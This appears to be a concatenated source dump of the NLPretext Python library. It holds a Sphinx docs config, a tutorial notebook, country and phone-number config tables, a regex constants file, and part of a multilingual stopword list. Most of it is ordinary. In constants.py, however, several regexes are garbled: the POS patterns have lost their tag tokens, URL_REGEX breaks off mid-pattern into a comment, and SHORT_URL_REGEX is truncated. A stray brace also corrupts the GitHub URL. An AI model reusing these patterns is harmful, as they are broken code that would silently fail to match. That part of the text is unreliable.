smv_prefer_remote_refs = False
smv_remote_whitelist = None
smv_prebuild_command = (
"poetry run sphinx-apidoc -f -o source/apidoc/ "
"../nlpretext/ "
"--implicit-namespaces -M -t source/_templates"
)
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# Autodoc parameters
always_document_param_types = True
add_module_names = False
autodoc_member_order = "bysource"
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme"
github_url = "https://www.github.com/artefactory/NLPretext}"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# Font packages
"fontpkg": "\\usepackage{amsmath, amsfonts, amssymb, amsthm}"
}
================================================
FILE: docs/source/index.rst
================================================
=========
NLPretext
=========
Welcome to NLPretext's documentation!
========================================
The NLPretext library aimed to be a meta-library to be used to help you get started on handling your NLP use-case preprocessing.
# Installation
Beware, this package has been tested on Python `3.8`, `3.9` & `3.10` and will probably not be working under python **2.7** as **Python2.7** EOL is scheduled for December 2019.
To install this library you should first clone the repository:
pip install nlpretext
.. toctree::
:maxdepth: 4
:caption: Tutorials:
./tutorials/index
.. toctree::
:maxdepth: 2
:caption: API Reference:
./apidoc/modules
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
================================================
FILE: docs/source/tutorials/basic_notebook.ipynb
================================================
{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# How to use the package in a notebook\n",
"\n",
"\n",
"\n",
"
\n",
"\n",
"\n",
"\n",
"
\n",
"\n",
"### *nlpretext*\n",
"\n",
"
\n",
"\n",
"## Installing from the main branch\n",
"\n",
"To install the library from the main branch, you can run the following cell :"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"pycharm": {
"name": "#%%\n"
}
},
"outputs": [],
"source": [
"%pip install git+ssh://git@github.com/artefactory/NLPretext.git@main"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Installing from a specific release\n",
"\n",
"To install the library from a specific release, you can run the following cell :"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"pycharm": {
"name": "#%%\n"
}
},
"outputs": [],
"source": [
"%pip install git+ssh://git@github.com/artefactory/NLPretext.git@v1.0.5"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Using the package\n",
"\n",
"You can now import and run whatever is in the package :"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"pycharm": {
"name": "#%%\n"
}
},
"outputs": [],
"source": [
"from nlpretext.basic.preprocess import replace_emails\n",
"\n",
"example = \"I have forwarded this email to obama@whitehouse.gov\"\n",
"example = replace_emails(example, replace_with=\"*EMAIL*\")"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"pycharm": {
"name": "#%%\n"
}
},
"outputs": [],
"source": [
"print(example)"
]
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.9"
}
},
"nbformat": 4,
"nbformat_minor": 1
}
================================================
FILE: docs/source/tutorials/index.rst
================================================
Tutorials
=========
.. toctree::
:maxdepth: 4
:glob:
basic_notebook
================================================
FILE: nlpretext/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# mypy: disable-error-code="attr-defined"
# mypy: disable-error-code="assignment"
"""All the goto functions you need to handle NLP use-cases, integrated in NLPretext."""
from importlib.metadata import PackageNotFoundError, version
from nlpretext.preprocessor import Preprocessor
try:
__version__ = version(__name__)
except PackageNotFoundError: # pragma: no cover
__version__ = "unknown"
__all__ = ["Preprocessor"]
================================================
FILE: nlpretext/_config/__init__.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
================================================
FILE: nlpretext/_config/config.py
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#!/usr/local/bin/python3
from typing import List, Optional
import os
import phonenumbers as _phonenumbers
ROOT_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), "../.."))
# Country config
COUNTRY_MAPPING_ISO = {
"af": "Afghanistan",
"ax": "Åland Islands",
"al": "Albania",
"dz": "Algeria",
"as": "American Samoa",
"ad": "Andorra",
"ao": "Angola",
"ai": "Anguilla",
"aq": "Antarctica",
"ag": "Antigua and Barbuda",
"ar": "Argentina",
"am": "Armenia",
"aw": "Aruba",
"au": "Australia",
"at": "Austria",
"az": "Azerbaijan",
"bs": "Bahamas",
"bh": "Bahrain",
"bd": "Bangladesh",
"bb": "Barbados",
"by": "Belarus",
"be": "Belgium",
"bz": "Belize",
"bj": "Benin",
"bm": "Bermuda",
"bt": "Bhutan",
"bo": "Bolivia (Plurinational State of)",
"bq": "Bonaire, Sint Eustatius and Saba",
"ba": "Bosnia and Herzegovina",
"bw": "Botswana",
"bv": "Bouvet Island",
"br": "Brazil",
"io": "British Indian Ocean Territory",
"bn": "Brunei Darussalam",
"bg": "Bulgaria",
"bf": "Burkina Faso",
"bi": "Burundi",
"cv": "Cabo Verde",
"kh": "Cambodia",
"cm": "Cameroon",
"ca": "Canada",
"ky": "Cayman Islands",
"cf": "Central African Republic",
"td": "Chad",
"cl": "Chile",
"cn": "China",
"cx": "Christmas Island",
"cc": "Cocos (Keeling) Islands",
"co": "Colombia",
"km": "Comoros",
"cg": "Congo",
"cd": "Congo, Democratic Republic of the",
"ck": "Cook Islands",
"cr": "Costa Rica",
"ci": "Côte d'Ivoire",
"hr": "Croatia",
"cu": "Cuba",
"cw": "Curaçao",
"cy": "Cyprus",
"cz": "Czechia",
"dk": "Denmark",
"dj": "Djibouti",
"dm": "Dominica",
"do": "Dominican Republic",
"ec": "Ecuador",
"eg": "Egypt",
"sv": "El Salvador",
"gq": "Equatorial Guinea",
"er": "Eritrea",
"ee": "Estonia",
"sz": "Eswatini",
"et": "Ethiopia",
"fk": "Falkland Islands (Malvinas)",
"fo": "Faroe Islands",
"fj": "Fiji",
"fi": "Finland",
"fr": "France",
"gf": "French Guiana",
"pf": "French Polynesia",
"tf": "French Southern Territories",
"ga": "Gabon",
"gm": "Gambia",
"ge": "Georgia",
"de": "Germany",
"gh": "Ghana",
"gi": "Gibraltar",
"gr": "Greece",
"gl": "Greenland",
"gd": "Grenada",
"gp": "Guadeloupe",
"gu": "Guam",
"gt": "Guatemala",
"gg": "Guernsey",
"gn": "Guinea",
"gw": "Guinea-Bissau",
"gy": "Guyana",
"ht": "Haiti",
"hm": "Heard Island and McDonald Islands",
"va": "Holy See",
"hn": "Honduras",
"hk": "Hong Kong",
"hu": "Hungary",
"is": "Iceland",
"in": "India",
"id": "Indonesia",
"ir": "Iran (Islamic Republic of)",
"iq": "Iraq",
"ie": "Ireland",
"im": "Isle of Man",
"il": "Israel",
"it": "Italy",
"jm": "Jamaica",
"jp": "Japan",
"je": "Jersey",
"jo": "Jordan",
"kz": "Kazakhstan",
"ke": "Kenya",
"ki": "Kiribati",
"kp": "Korea (Democratic People's Republic of)",
"kr": "Korea, Republic of",
"kw": "Kuwait",
"kg": "Kyrgyzstan",
"la": "Lao People's Democratic Republic",
"lv": "Latvia",
"lb": "Lebanon",
"ls": "Lesotho",
"lr": "Liberia",
"ly": "Libya",
"li": "Liechtenstein",
"lt": "Lithuania",
"lu": "Luxembourg",
"mo": "Macao",
"mg": "Madagascar",
"mw": "Malawi",
"my": "Malaysia",
"mv": "Maldives",
"ml": "Mali",
"mt": "Malta",
"mh": "Marshall Islands",
"mq": "Martinique",
"mr": "Mauritania",
"mu": "Mauritius",
"yt": "Mayotte",
"mx": "Mexico",
"fm": "Micronesia (Federated States of)",
"md": "Moldova, Republic of",
"mc": "Monaco",
"mn": "Mongolia",
"me": "Montenegro",
"ms": "Montserrat",
"ma": "Morocco",
"mz": "Mozambique",
"mm": "Myanmar",
"na": "Namibia",
"nr": "Nauru",
"np": "Nepal",
"nl": "Netherlands",
"nc": "New Caledonia",
"nz": "New Zealand",
"ni": "Nicaragua",
"ne": "Niger",
"ng": "Nigeria",
"nu": "Niue",
"nf": "Norfolk Island",
"mk": "North Macedonia",
"mp": "Northern Mariana Islands",
"no": "Norway",
"om": "Oman",
"pk": "Pakistan",
"pw": "Palau",
"ps": "Palestine, State of",
"pa": "Panama",
"pg": "Papua New Guinea",
"py": "Paraguay",
"pe": "Peru",
"ph": "Philippines",
"pn": "Pitcairn",
"pl": "Poland",
"pt": "Portugal",
"pr": "Puerto Rico",
"qa": "Qatar",
"re": "Réunion",
"ro": "Romania",
"ru": "Russian Federation",
"rw": "Rwanda",
"bl": "Saint Barthélemy",
"sh": "Saint Helena, Ascension and Tristan da Cunha",
"kn": "Saint Kitts and Nevis",
"lc": "Saint Lucia",
"mf": "Saint Martin (French part)",
"pm": "Saint Pierre and Miquelon",
"vc": "Saint Vincent and the Grenadines",
"ws": "Samoa",
"sm": "San Marino",
"st": "Sao Tome and Principe",
"sa": "Saudi Arabia",
"sn": "Senegal",
"rs": "Serbia",
"sc": "Seychelles",
"sl": "Sierra Leone",
"sg": "Singapore",
"sx": "Sint Maarten (Dutch part)",
"sk": "Slovakia",
"si": "Slovenia",
"sb": "Solomon Islands",
"so": "Somalia",
"za": "South Africa",
"gs": "South Georgia and the South Sandwich Islands",
"ss": "South Sudan",
"es": "Spain",
"lk": "Sri Lanka",
"sd": "Sudan",
"sr": "Suriname",
"sj": "Svalbard and Jan Mayen",
"se": "Sweden",
"ch": "Switzerland",
"sy": "Syrian Arab Republic",
"tw": "Taiwan, Province of China",
"tj": "Tajikistan",
"tz": "Tanzania, United Republic of",
"th": "Thailand",
"tl": "Timor-Leste",
"tg": "Togo",
"tk": "Tokelau",
"to": "Tonga",
"tt": "Trinidad and Tobago",
"tn": "Tunisia",
"tr": "Turkey",
"tm": "Turkmenistan",
"tc": "Turks and Caicos Islands",
"tv": "Tuvalu",
"ug": "Uganda",
"ua": "Ukraine",
"ae": "United Arab Emirates",
"gb": "United Kingdom of Great Britain and Northern Ireland",
"us": "United States of America",
"um": "United States Minor Outlying Islands",
"uy": "Uruguay",
"uz": "Uzbekistan",
"vu": "Vanuatu",
"ve": "Venezuela (Bolivarian Republic of)",
"vn": "Viet Nam",
"vg": "Virgin Islands (British)",
"vi": "Virgin Islands (U.S.)",
"wf": "Wallis and Futuna",
"eh": "Western Sahara",
"ye": "Yemen",
"zm": "Zambia",
"zw": "Zimbabwe",
}
# Phone numbers config
SUPPORTED_COUNTRY: List[Optional[str]] = [
None,
"US",
"AG",
"AI",
"AS",
"BB",
"BM",
"BS",
"CA",
"DM",
"GD",
"GU",
"JM",
"KN",
"KY",
"LC",
"MP",
"MS",
"PR",
"SX",
"TC",
"TT",
"VC",
"VG",
"VI",
"RU",
"KZ",
"EG",
"ZA",
"GR",
"NL",
"BE",
"FR",
"ES",
"HU",
"IT",
"VA",
"RO",
"CH",
"AT",
"GB",
"GG",
"IM",
"JE",
"DK",
"SE",
"NO",
"SJ",
"PL",
"DE",
"PE",
"MX",
"CU",
"AR",
"BR",
"CL",
"CO",
"VE",
"MY",
"AU",
"CC",
"CX",
"ID",
"PH",
"NZ",
"SG",
"TH",
"JP",
"KR",
"VN",
"CN",
"TR",
"IN",
"PK",
"AF",
"LK",
"MM",
"IR",
"SS",
"MA",
"EH",
"DZ",
"TN",
"LY",
"GM",
"SN",
"MR",
"ML",
"GN",
"CI",
"BF",
"NE",
"TG",
"BJ",
"MU",
"LR",
"SL",
"GH",
"NG",
"TD",
"CF",
"CM",
"CV",
"ST",
"GQ",
"GA",
"CG",
"CD",
"AO",
"GW",
"IO",
"AC",
"SC",
"SD",
"RW",
"ET",
"SO",
"DJ",
"KE",
"TZ",
"UG",
"BI",
"MZ",
"ZM",
"MG",
"RE",
"YT",
"ZW",
"NA",
"MW",
"LS",
"BW",
"SZ",
"KM",
"SH",
"TA",
"ER",
"AW",
"FO",
"GL",
"GI",
"PT",
"LU",
"IE",
"IS",
"AL",
"MT",
"CY",
"FI",
"AX",
"BG",
"LT",
"LV",
"EE",
"MD",
"AM",
"BY",
"AD",
"MC",
"SM",
"UA",
"RS",
"ME",
"XK",
"HR",
"SI",
"BA",
"MK",
"CZ",
"SK",
"LI",
"FK",
"BZ",
"GT",
"SV",
"HN",
"NI",
"CR",
"PA",
"PM",
"HT",
"GP",
"BL",
"MF",
"BO",
"GY",
"EC",
"GF",
"PY",
"MQ",
"SR",
"UY",
"CW",
"BQ",
"TL",
"NF",
"BN",
"NR",
"PG",
"TO",
"SB",
"VU",
"FJ",
"PW",
"WF",
"CK",
"NU",
"WS",
"KI",
"NC",
"TV",
"PF",
"TK",
"FM",
"MH",
"KP",
"HK",
"MO",
"KH",
"LA",
"BD",
"TW",
"MV",
"LB",
"JO",
"SY",
"IQ",
"KW",
"SA",
"YE",
"OM",
"PS",
"AE",
"IL",
"BH",
"QA",
"BT",
"MN",
"NP",
"TJ",
"TM",
"AZ",
"GE",
"KG",
"UZ",
"DO",
]
FORMAT_NUMBERS = {
"E164": _phonenumbers.PhoneNumberFormat.E164,
"INTERNATIONAL": _phonenumbers.PhoneNumberFormat.INTERNATIONAL,
"NATIONAL": _phonenumbers.PhoneNumberFormat.NATIONAL,
"RFC3966": _phonenumbers.PhoneNumberFormat.RFC3966,
}
================================================
FILE: nlpretext/_config/constants.py
================================================
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
# mypy: disable-error-code="attr-defined"
"""
Collection of regular expressions and other (small, generally useful) constants.
Credits to textacy for some of them: https://github.com/chartbeat-labs/textacy.
"""
import re
import sys
import unicodedata
import regex
NUMERIC_NE_TYPES = {
"ORDINAL",
"CARDINAL",
"MONEY",
"QUANTITY",
"PERCENT",
"TIME",
"DATE",
}
SUBJ_DEPS = {"agent", "csubj", "csubjpass", "expl", "nsubj", "nsubjpass"}
OBJ_DEPS = {"attr", "dobj", "dative", "oprd"}
AUX_DEPS = {"aux", "auxpass", "neg"}
REPORTING_VERBS = {
"according",
"accuse",
"acknowledge",
"add",
"admit",
"agree",
"allege",
"announce",
"argue",
"ask",
"assert",
"believe",
"blame",
"charge",
"cite",
"claim",
"complain",
"concede",
"conclude",
"confirm",
"contend",
"criticize",
"declare",
"decline",
"deny",
"describe",
"disagree",
"disclose",
"estimate",
"explain",
"fear",
"hope",
"insist",
"maintain",
"mention",
"note",
"observe",
"order",
"predict",
"promise",
"recall",
"recommend",
"reply",
"report",
"say",
"state",
"stress",
"suggest",
"tell",
"testify",
"think",
"urge",
"warn",
"worry",
"write",
}
CURRENCIES = {
"$": "USD",
"zł": "PLN",
"£": "GBP",
"¥": "JPY",
"฿": "THB",
"₡": "CRC",
"₦": "NGN",
"₩": "KRW",
"₪": "ILS",
"₫": "VND",
"€": "EUR",
"₱": "PHP",
"₲": "PYG",
"₴": "UAH",
"₹": "INR",
}
POS_REGEX_PATTERNS = {
"en": {
"NP": r"? * ( ? ?)* (| ?)+",
"PP": r" ? * ( ? ?)* ( ?)+",
"VP": r"* * ",
}
}
PUNCT_TRANSLATE_UNICODE = dict.fromkeys(
(i for i in range(sys.maxunicode) if unicodedata.category(chr(i)).startswith("P")),
" ",
)
ACRONYM_REGEX = re.compile(
r"(?:^|(?<=\W))(?:(?:(?:(?:[A-Z]\.?)+[a-z0-9&/-]?)+(?:[A-Z][s.]?|[0-9]s?))|(?:[0-9](?:\-?[A-Z])+))(?:$|(?=\W))",
flags=re.UNICODE,
)
EMAIL_REGEX = re.compile(
r"(?:^|(?<=[^\w@.)]))([\w+-](\.(?!\.))?)*?[\w+-]@(?:\w-?)*?\w+(\.([a-z]{2,})){1,3}(?:$|(?=\b))",
flags=re.IGNORECASE | re.UNICODE,
)
PHONE_REGEX = re.compile(
r"(?:^|(?<=[^\w)]))(\+?1[ .-]?)?(\(?\d{3}\)?[ .-]?)?(\d{3}[ .-]?\d{4})(\s?(?:ext\.?|[#x-])\s?\d{2,6})?(?:$|(?=\W))" # noqa: E501
)
NUMBERS_REGEX = re.compile(
r"(?:^|(?<=[^\w,.]))[+–-]?(([1-9]\d{0,2}(,\d{3})+(\.\d*)?)|([1-9]\d{0,2}([ .]\d{3})+(,\d*)?)|"
r"(\d*?[.,]\d+)|\d+)(?:|(?=\b))"
)
CURRENCY_REGEX = re.compile("({})+".format("|".join(re.escape(c) for c in CURRENCIES)))
LINEBREAK_REGEX = re.compile(r"((\r\n)|[\n\v])+")
NONBREAKING_SPACE_REGEX = re.compile(r"(?!\n)\s+")
URL_REGEX = re.compile(
r"(?:|(?= 224.0.0.0
# excludes network & broadcast addresses
# (first & last IP address of each class)
r"(?:[1-9]\d?|1\d\d|2[01]\d|22[0-3])"
r"(?:\.(?:1?\d{1,2}|2[0-4]\d|25[0-5])){2}"
r"(?:\.(?:[1-9]\d?|1\d\d|2[0-4]\d|25[0-4]))"
r"|"
# host name
r"(?:(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)"
# domain name
r"(?:\.(?:[a-z\u00a1-\uffff0-9]-?)*[a-z\u00a1-\uffff0-9]+)*"
# TLD identifier
r"(?:\.(?:[a-z\u00a1-\uffff]{2,}))" r")"
# port number
r"(?::\d{2,5})?"
# resource path
r"(?:/\S*)?" r"(?:$|(?![\w?!+&/]))",
flags=re.UNICODE | re.IGNORECASE,
) # source: https://gist.github.com/dperini/729294
SHORT_URL_REGEX = re.compile(
r"(?:^|(?")
# TEXT LOADER
TEXT_FILE_FORMATS_PATTERN = re.compile(r"^.*\.(json|csv|txt|parquet)(\.gz|\.zip)*$")
================================================
FILE: nlpretext/_config/stopwords.py
================================================
STOPWORDS = {
"af": [
"'n",
"aan",
"af",
"al",
"as",
"baie",
"by",
"daar",
"dag",
"dat",
"die",
"dit",
"een",
"ek",
"en",
"gaan",
"gesê",
"haar",
"het",
"hom",
"hulle",
"hy",
"in",
"is",
"jou",
"jy",
"kan",
"kom",
"ma",
"maar",
"met",
"my",
"na",
"nie",
"om",
"ons",
"op",
"saam",
"sal",
"se",
"sien",
"so",
"sy",
"te",
"toe",
"uit",
"van",
"vir",
"was",
"wat",
"ʼn",
],
"ha": [
"a",
"amma",
"ba",
"ban",
"ce",
"cikin",
"da",
"don",
"ga",
"in",
"ina",
"ita",
"ji",
"ka",
"ko",
"kuma",
"lokacin",
"ma",
"mai",
"na",
"ne",
"ni",
"sai",
"shi",
"su",
"suka",
"sun",
"ta",
"tafi",
"take",
"tana",
"wani",
"wannan",
"wata",
"ya",
"yake",
"yana",
"yi",
"za",
],
"so": [
"aad",
"albaabkii",
"atabo",
"ay",
"ayaa",
"ayee",
"ayuu",
"dhan",
"hadana",
"in",
"inuu",
"isku",
"jiray",
"jirtay",
"ka",
"kale",
"kasoo",
"ku",
"kuu",
"lakin",
"markii",
"oo",
"si",
"soo",
"uga",
"ugu",
"uu",
"waa",
"waxa",
"waxuu",
],
"st": [
"a",
"ba",
"bane",
"bona",
"e",
"ea",
"eaba",
"empa",
"ena",
"ha",
"hae",
"hape",
"ho",
"hore",
"ka",
"ke",
"la",
"le",
"li",
"me",
"mo",
"moo",
"ne",
"o",
"oa",
"re",
"sa",
"se",
"tloha",
"tsa",
"tse",
],
"sw": [
"akasema",
"alikuwa",
"alisema",
"baada",
"basi",
"bila",
"cha",
"chini",
"hadi",
"hapo",
"hata",
"hivyo",
"hiyo",
"huku",
"huo",
"ili",
"ilikuwa",
"juu",
"kama",
"karibu",
"katika",
"kila",
"kima",
"kisha",
"kubwa",
"kutoka",
"kuwa",
"kwa",
"kwamba",
"kwenda",
"kwenye",
"la",
"lakini",
"mara",
"mdogo",
"mimi",
"mkubwa",
"mmoja",
"moja",
"muda",
"mwenye",
"na",
"naye",
"ndani",
"ng",
"ni",
"nini",
"nonkungu",
"pamoja",
"pia",
"sana",
"sasa",
"sauti",
"tafadhali",
"tena",
"tu",
"vile",
"wa",
"wakati",
"wake",
"walikuwa",
"wao",
"watu",
"wengine",
"wote",
"ya",
"yake",
"yangu",
"yao",
"yeye",
"yule",
"za",
"zaidi",
"zake",
],
"yo": [
"a",
"an",
"bá",
"bí",
"bẹ̀rẹ̀",
"fún",
"fẹ́",
"gbogbo",
"inú",
"jù",
"jẹ",
"jẹ́",
"kan",
"kì",
"kí",
"kò",
"láti",
"lè",
"lọ",
"mi",
"mo",
"máa",
"mọ̀",
"ni",
"náà",
"ní",
"nígbà",
"nítorí",
"nǹkan",
"o",
"padà",
"pé",
"púpọ̀",
"pẹ̀lú",
"rẹ̀",
"sì",
"sí",
"sínú",
"ṣ",
"ti",
"tí",
"wà",
"wá",
"wọn",
"wọ́n",
"yìí",
"àti",
"àwọn",
"é",
"í",
"òun",
"ó",
"ń",
"ńlá",
"ṣe",
"ṣé",
"ṣùgbọ́n",
"ẹmọ́",
"ọjọ́",
"ọ̀pọ̀lọpọ̀",
],
"zu": [
"futhi",
"kahle",
"kakhulu",
"kanye",
"khona",
"kodwa",
"kungani",
"kusho",
"la",
"lakhe",
"lapho",
"mina",
"ngesikhathi",
"nje",
"phansi",
"phezulu",
"u",
"ukuba",
"ukuthi",
"ukuze",
"uma",
"wahamba",
"wakhe",
"wami",
"wase",
"wathi",
"yakhe",
"zakhe",
"zonke",
],
"da": [
"af",
"alle",
"andet",
"andre",
"at",
"begge",
"da",
"de",
"den",
"denne",
"der",
"deres",
"det",
"dette",
"dig",
"din",
"dog",
"du",
"ej",
"eller",
"en",
"end",
"ene",
"eneste",
"enhver",
"et",
"fem",
"fire",
"flere",
"fleste",
"for",
"fordi",
"forrige",
"fra",
"få",
"før",
"god",
"han",
"hans",
"har",
"hendes",
"her",
"hun",
"hvad",
"hvem",
"hver",
"hvilken",
"hvis",
"hvor",
"hvordan",
"hvorfor",
"hvornår",
"i",
"ikke",
"ind",
"ingen",
"intet",
"jeg",
"jeres",
"kan",
"kom",
"kommer",
"lav",
"lidt",
"lille",
"man",
"mand",
"mange",
"med",
"meget",
"men",
"mens",
"mere",
"mig",
"ned",
"ni",
"nogen",
"noget",
"ny",
"nyt",
"nær",
"næste",
"næsten",
"og",
"op",
"otte",
"over",
"på",
"se",
"seks",
"ses",
"som",
"stor",
"store",
"syv",
"ti",
"til",
"to",
"tre",
"ud",
"var",
],
"de": [
"Ernst",
"Ordnung",
"Schluss",
"a",
"ab",
"aber",
"ach",
"acht",
"achte",
"achten",
"achter",
"achtes",
"ag",
"alle",
"allein",
"allem",
"allen",
"aller",
"allerdings",
"alles",
"allgemeinen",
"als",
"also",
"am",
"an",
"andere",
"anderen",
"andern",
"anders",
"au",
"auch",
"auf",
"aus",
"ausser",
"ausserdem",
"außer",
"außerdem",
"b",
"bald",
"bei",
"beide",
"beiden",
"beim",
"beispiel",
"bekannt",
"bereits",
"besonders",
"besser",
"besten",
"bin",
"bis",
"bisher",
"bist",
"c",
"d",
"d.h",
"da",
"dabei",
"dadurch",
"dafür",
"dagegen",
"daher",
"dahin",
"dahinter",
"damals",
"damit",
"danach",
"daneben",
"dank",
"dann",
"daran",
"darauf",
"daraus",
"darf",
"darfst",
"darin",
"darum",
"darunter",
"darüber",
"das",
"dasein",
"daselbst",
"dass",
"dasselbe",
"davon",
"davor",
"dazu",
"dazwischen",
"daß",
"dein",
"deine",
"deinem",
"deiner",
"dem",
"dementsprechend",
"demgegenüber",
"demgemäss",
"demgemäß",
"demselben",
"demzufolge",
"den",
"denen",
"denn",
"denselben",
"der",
"deren",
"derjenige",
"derjenigen",
"dermassen",
"dermaßen",
"derselbe",
"derselben",
"des",
"deshalb",
"desselben",
"dessen",
"deswegen",
"dich",
"die",
"diejenige",
"diejenigen",
"dies",
"diese",
"dieselbe",
"dieselben",
"diesem",
"diesen",
"dieser",
"dieses",
"dir",
"doch",
"dort",
"drei",
"drin",
"dritte",
"dritten",
"dritter",
"drittes",
"du",
"durch",
"durchaus",
"durfte",
"durften",
"dürfen",
"dürft",
"e",
"eben",
"ebenso",
"ehrlich",
"ei",
"ei,",
"eigen",
"eigene",
"eigenen",
"eigener",
"eigenes",
"ein",
"einander",
"eine",
"einem",
"einen",
"einer",
"eines",
"einige",
"einigen",
"einiger",
"einiges",
"einmal",
"eins",
"elf",
"en",
"ende",
"endlich",
"entweder",
"er",
"erst",
"erste",
"ersten",
"erster",
"erstes",
"es",
"etwa",
"etwas",
"euch",
"euer",
"eure",
"f",
"folgende",
"früher",
"fünf",
"fünfte",
"fünften",
"fünfter",
"fünftes",
"für",
"g",
"gab",
"ganz",
"ganze",
"ganzen",
"ganzer",
"ganzes",
"gar",
"gedurft",
"gegen",
"gegenüber",
"gehabt",
"gehen",
"geht",
"gekannt",
"gekonnt",
"gemacht",
"gemocht",
"gemusst",
"genug",
"gerade",
"gern",
"gesagt",
"geschweige",
"gewesen",
"gewollt",
"geworden",
"gibt",
"ging",
"gleich",
"gott",
"gross",
"grosse",
"grossen",
"grosser",
"grosses",
"groß",
"große",
"großen",
"großer",
"großes",
"gut",
"gute",
"guter",
"gutes",
"h",
"habe",
"haben",
"habt",
"hast",
"hat",
"hatte",
"hatten",
"hattest",
"hattet",
"heisst",
"her",
"heute",
"hier",
"hin",
"hinter",
"hoch",
"hätte",
"hätten",
"i",
"ich",
"ihm",
"ihn",
"ihnen",
"ihr",
"ihre",
"ihrem",
"ihren",
"ihrer",
"ihres",
"im",
"immer",
"in",
"indem",
"infolgedessen",
"ins",
"irgend",
"ist",
"j",
"ja",
"jahr",
"jahre",
"jahren",
"je",
"jede",
"jedem",
"jeden",
"jeder",
"jedermann",
"jedermanns",
"jedes",
"jedoch",
"jemand",
"jemandem",
"jemanden",
"jene",
"jenem",
"jenen",
"jener",
"jenes",
"jetzt",
"k",
"kam",
"kann",
"kannst",
"kaum",
"kein",
"keine",
"keinem",
"keinen",
"keiner",
"kleine",
"kleinen",
"kleiner",
"kleines",
"kommen",
"kommt",
"konnte",
"konnten",
"kurz",
"können",
"könnt",
"könnte",
"l",
"lang",
"lange",
"leicht",
"leide",
"lieber",
"los",
"m",
"machen",
"macht",
"machte",
"mag",
"magst",
"mahn",
"mal",
"man",
"manche",
"manchem",
"manchen",
"mancher",
"manches",
"mann",
"mehr",
"mein",
"meine",
"meinem",
"meinen",
"meiner",
"meines",
"mensch",
"menschen",
"mich",
"mir",
"mit",
"mittel",
"mochte",
"mochten",
"morgen",
"muss",
"musst",
"musste",
"mussten",
"muß",
"mußt",
"möchte",
"mögen",
"möglich",
"mögt",
"müssen",
"müsst",
"müßt",
"n",
"na",
"nach",
"nachdem",
"nahm",
"natürlich",
"neben",
"nein",
"neue",
"neuen",
"neun",
"neunte",
"neunten",
"neunter",
"neuntes",
"nicht",
"nichts",
"nie",
"niemand",
"niemandem",
"niemanden",
"noch",
"nun",
"nur",
"o",
"ob",
"oben",
"oder",
"offen",
"oft",
"ohne",
"p",
"q",
"r",
"recht",
"rechte",
"rechten",
"rechter",
"rechtes",
"richtig",
"rund",
"s",
"sa",
"sache",
"sagt",
"sagte",
"sah",
"satt",
"schlecht",
"schon",
"sechs",
"sechste",
"sechsten",
"sechster",
"sechstes",
"sehr",
"sei",
"seid",
"seien",
"sein",
"seine",
"seinem",
"seinen",
"seiner",
"seines",
"seit",
"seitdem",
"selbst",
"sich",
"sie",
"sieben",
"siebente",
"siebenten",
"siebenter",
"siebentes",
"sind",
"so",
"solang",
"solche",
"solchem",
"solchen",
"solcher",
"solches",
"soll",
"sollen",
"sollst",
"sollt",
"sollte",
